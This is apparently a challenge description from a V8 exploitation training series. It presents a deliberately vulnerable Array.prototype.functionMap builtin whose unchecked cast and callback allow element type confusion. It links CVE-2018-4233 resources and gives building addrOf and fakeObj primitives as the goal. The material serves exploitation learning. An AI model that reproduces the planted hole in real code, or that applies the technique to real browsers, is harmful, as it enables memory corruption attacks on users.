# Level 6

## Problem

Given a vulnerable builtin `Array.prototype.functionMap(func)`:
- It takes a `PACKED_DOUBLE_ELEMENTS` JSArray receiver and a JSFunction argument.
- **reinterpret_cast** `elements` to a `FixedDoubleArray`, then for each element `e`:
    - Trigger a custom JavaScript callback `func`, with
        - Input: this double element `e`
        - Output: any double element `o`
    - And store `o` to `e`'s original position.

## Key Knowledge

- Side Effect based Array Element Type Confusion
    - CVE-2018-4233
        - [saelo/cve-2018-4233: Exploit for CVE-2018-4233, a WebKit JIT optimization bug used during Pwn2Own 2018](https://github.com/saelo/cve-2018-4233)
        - [Attacking Client-Side JIT Compilers (v2)](https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf#page=106)
        - [Pwn2Own 2018 CVE-2018-4233 分析](https://www.anquanke.com/post/id/244472)
    - Use this technique to construct Address Of & Fake Object primitive.
- How to build d8 and debug them?
    - [Building V8 from source](https://v8.dev/docs/build)
    - [Building V8 with GN](https://v8.dev/docs/build-gn)